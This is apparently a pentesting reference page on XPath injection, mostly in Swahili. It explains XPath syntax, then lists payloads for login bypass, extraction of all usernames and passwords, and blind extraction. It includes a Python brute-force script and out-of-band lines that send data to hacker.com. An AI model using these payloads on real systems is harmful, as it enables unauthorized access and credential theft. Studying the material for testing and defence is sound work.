Jiunge na HackenProof Discord server ili kuwasiliana na wadukuzi wenye uzoefu na wawindaji wa zawadi za mdudu!
Machapisho ya Udukuzi
Shiriki na yaliyomo yanayochimba katika msisimko na changamoto za udukuzi
Habari za Udukuzi za Wakati Halisi
Kaa sasa na ulimwengu wa udukuzi wenye kasi kupitia habari za wakati halisi na ufahamu
Matangazo ya Karibuni
Baki mwelewa na zawadi mpya za mdudu zinazoanzishwa na sasisho muhimu za jukwaa
Jiunge nasi kwenyeDiscord na anza kushirikiana na wadukuzi bora leo!
Sintaksia Msingi
Mbinu ya mashambulizi inayojulikana kama Uingizaji wa XPath hutumiwa kuchukua faida ya programu ambazo hufanya maswali ya XPath (Lugha ya Njia ya XML) kulingana na matokeo ya mtumiaji ili kuuliza au kutembea nyaraka za XML.
Nodes Zilizoelezwa
Majedwali hutumiwa kuchagua nodes mbalimbali katika hati ya XML. Majedwali haya na maelezo yake yameorodheshwa hapa chini:
nodename: Nodes zote zenye jina "nodename" zinachaguliwa.
/: Uchaguzi unafanywa kutoka kwa node ya msingi.
//: Nodes zinazolingana na uchaguzi kutoka kwa node ya sasa zinachaguliwa, bila kujali mahali walipo kwenye hati.
.: Node ya sasa imechaguliwa.
..: Mzazi wa node ya sasa umechaguliwa.
@: Vipengele vinachaguliwa.
Mifano ya XPath
Mifano ya maelezo ya njia na matokeo yake ni pamoja na:
bookstore: Nodes zote zenye jina "bookstore" zinachaguliwa.
/bookstore: Kipengele cha msingi cha duka la vitabu kimechaguliwa. Inasisitizwa kuwa njia kamili kwa kipengele ni kuanzia na mshale (/).
bookstore/book: Vitabu vyote vinavyokuwa watoto wa duka la vitabu vimechaguliwa.
//book: Vitabu vyote katika hati zinachaguliwa, bila kujali mahali walipo.
bookstore//book: Vitabu vyote vinavyokuwa wazao wa kipengele cha duka la vitabu vimechaguliwa, bila kujali nafasi yao chini ya kipengele cha duka la vitabu.
//@lang: Vipengele vyote vyenye jina la lang vinachaguliwa.
Matumizi ya Predicates
Predicates hutumiwa kurekebisha uchaguzi:
/bookstore/book[1]: Kipengele cha kwanza cha kitabu kilichokuwa mtoto wa kipengele cha duka la vitabu kimechaguliwa. Mbinu ya kuzunguka kwa IE toleo 5 hadi 9, ambayo inaorodhesha node ya kwanza kama [0], ni kuweka SelectionLanguage kuwa XPath kupitia JavaScript.
/bookstore/book[last()]: Kipengele cha mwisho cha kitabu kilichokuwa mtoto wa kipengele cha duka la vitabu kimechaguliwa.
/bookstore/book[last()-1]: Kipengele cha kitabu cha mwisho kabla ya mwisho kilichokuwa mtoto wa kipengele cha duka la vitabu kimechaguliwa.
/bookstore/book[position()<3]: Vitabu viwili vya kwanza vilivyokuwa watoto wa kipengele cha duka la vitabu vimechaguliwa.
//title[@lang]: Vipengele vyote vya kichwa chenye sifa ya lang vinachaguliwa.
//title[@lang='en']: Vipengele vyote vya kichwa chenye sifa ya "lang" yenye thamani ya "en" vinachaguliwa.
/bookstore/book[price>35.00]: Vitabu vyote vya duka la vitabu vyenye bei kubwa kuliko 35.00 vinachaguliwa.
/bookstore/book[price>35.00]/title: Vipengele vyote vya kichwa vya vitabu vya duka la vitabu vyenye bei kubwa kuliko 35.00 vinachaguliwa.
Kushughulikia Nodes Zisizojulikana
Vidole vya mguu hutumiwa kwa kulinganisha nodes zisizojulikana:
*: Inalinganisha kipengele chochote cha node.
@*: Inalinganisha kipengele chochote cha sifa ya node.
node(): Inalinganisha node yoyote ya aina yoyote.
Mifano zaidi ni pamoja na:
/bookstore/*: Inachagua nodes za watoto zote za kipengele cha duka la vitabu.
//*: Inachagua vipengele vyote katika hati.
//title[@*]: Inachagua vipengele vyote vya kichwa chenye angalau sifa moja ya aina yoyote.
All names - [pepe, mark, fino]
name
//name
//name/node()
//name/child::node()
user/name
user//name
/user/name
//user/name
All values - [pepe, peponcio, admin, mark, ...]
//user/node()
//user/child::node()
Positions
//user[position()=1]/name #pepe
//user[last()-1]/name #mark
//user[position()=1]/child::node()[position()=2] #peponcio (password)
Functions
count(//user/node()) #3*3 = 9 (count all values)
string-length(//user[position()=1]/child::node()[position()=1]) #Length of "pepe" = 4
substrig(//user[position()=2/child::node()[position()=1],2,1) #Substring of mark: pos=2,length=1 --> "a"
Kutambua & kuiba mpangilio
andcount(/*)=1#rootandcount(/*[1]/*)=2#count(root) = 2 (a,c)andcount(/*[1]/*[1]/*)=1#count(a) = 1 (b)andcount(/*[1]/*[1]/*[1]/*)=0#count(b) = 0andcount(/*[1]/*[2]/*)=3#count(c) = 3 (d,e,f)andcount(/*[1]/*[2]/*[1]/*)=0#count(d) = 0andcount(/*[1]/*[2]/*[2]/*)=0#count(e) = 0andcount(/*[1]/*[2]/*[3]/*)=1#count(f) = 1 (g)andcount(/*[1]/*[2]/*[3]/[1]*)=0#count(g) = 0#The previous solutions are the representation of a schema like the following#(at this stage we don't know the name of the tags, but jus the schema)<root><a><b></b></a><c><d></d><e></e><f><h></h></f></c></root>andname(/*[1])="root"#Confirm the name of the first tag is "root"andsubstring(name(/*[1]/*[1]),1,1)="a"#First char of name of tag `<a>` is "a"and string-to-codepoints(substring(name(/*[1]/*[1]/*),1,1)) = 105 #Firts char of tag `<b>`is codepoint 105 ("i") (https://codepoints.net/)
#Stealing the schema via OOBdoc(concat("http://hacker.com/oob/", name(/*[1]/*[1]), name(/*[1]/*[1]/*[1])))doc-available(concat("http://hacker.com/oob/", name(/*[1]/*[1]), name(/*[1]/*[1]/*[1])))
Kupuuza Uthibitisho
Mfano wa maswali:
string(//user[name/text()='+VAR_USER+' and password/text()='+VAR_PASSWD+']/account/text())
$q = '/usuarios/usuario[cuenta="' . $_POST['user'] . '" and passwd="' . $_POST['passwd'] . '"]';
Kupita OR katika jina la mtumiaji na nenosiri (thamani sawa katika zote mbili)
' or '1'='1
" or "1"="1
' or ''='
" or ""="
string(//user[name/text()='' or '1'='1' and password/text()='' or '1'='1']/account/text())
Select account
Select the account using the username and use one of the previous values in the password field
Kutumia null injection
Username: ' or 1]%00
Double OR katika Jina la mtumiaji au katika nenosiri (ni halali na uwanja mmoja ulio hatarini)
MUHIMU: Tafadhali kumbuka kwamba "na" ni operesheni ya kwanza inayofanywa.
Bypass with first match
(This requests are also valid without spaces)
' or /* or '
' or "a" or '
' or 1 or '
' or true() or '
string(//user[name/text()='' or true() or '' and password/text()='']/account/text())
Select account
'or string-length(name(.))<10 or' #Select account with length(name)<10
'or contains(name,'adm') or' #Select first account having "adm" in the name
'or contains(.,'adm') or' #Select first account having "adm" in the current value
'or position()=2 or' #Select 2º account
string(//user[name/text()=''or position()=2 or'' and password/text()='']/account/text())
Select account (name known)
admin' or '
admin' or '1'='2
string(//user[name/text()='admin' or '1'='2' and password/text()='']/account/text())
Kunasa Nakala
Matokeo yana nakala na mtumiaji anaweza kubadilisha thamani za kutafuta:
/user/username[contains(., '+VALUE+')]
') or 1=1 or (' #Get all names
') or 1=1] | //user/password[('')=(' #Get all names and passwords
') or 2=1] | //user/node()[('')=(' #Get all values
')] | //./node()[('')=(' #Get all values
')] | //node()[('')=(' #Get all values
') or 1=1] | //user/password[('')=(' #Get all names and passwords
')] | //password%00 #All names and passwords (abusing null injection)
')]/../*[3][text()!=(' #All the passwords
')] | //user/*[1] | a[(' #The ID of all users
')] | //user/*[2] | a[(' #The name of all users
')] | //user/*[3] | a[(' #The password of all users
')] | //user/*[4] | a[(' #The account of all users
Utekaji wa Kipofu
Pata urefu wa thamani na uitoe kwa kulinganisha:
' or string-length(//user[position()=1]/child::node()[position()=1])=4 or ''='#True if length equals 4' or substring((//user[position()=1]/child::node()[position()=1]),1,1)="a" or ''='#True is first equals "a"substring(//user[userid=5]/username,2,1)=codepoints-to-string(INT_ORD_CHAR_HERE)... and ( if ( $employee/role = 2 ) then error() else 0 )... #When error() is executed it rises an error and never returns a value
Mfano wa Python
import requests, stringflag =""l =0alphabet = string.ascii_letters + string.digits +"{}_()"for i inrange(30):r = requests.get("http://example.com?action=user&userid=2 and string-length(password)="+str(i))if ("TRUE_COND"in r.text):l = ibreakprint("[+] Password length: "+str(l))for i inrange(1, l +1):#print("[i] Looking for char number " + str(i))for al in alphabet:r = requests.get("http://example.com?action=user&userid=2 and substring(password,"+str(i)+",1)="+al)if ("TRUE_COND"in r.text):flag += alprint("[+] Flag: "+ flag)break
doc(concat("http://hacker.com/oob/", RESULTS))doc(concat("http://hacker.com/oob/", /Employees/Employee[1]/username))doc(concat("http://hacker.com/oob/", encode-for-uri(/Employees/Employee[1]/username)))#Instead of doc() you can use the function doc-availabledoc-available(concat("http://hacker.com/oob/", RESULTS))#the doc available will respond true or false depending if the doc exists,#user not(doc-available(...)) to invert the result if you need to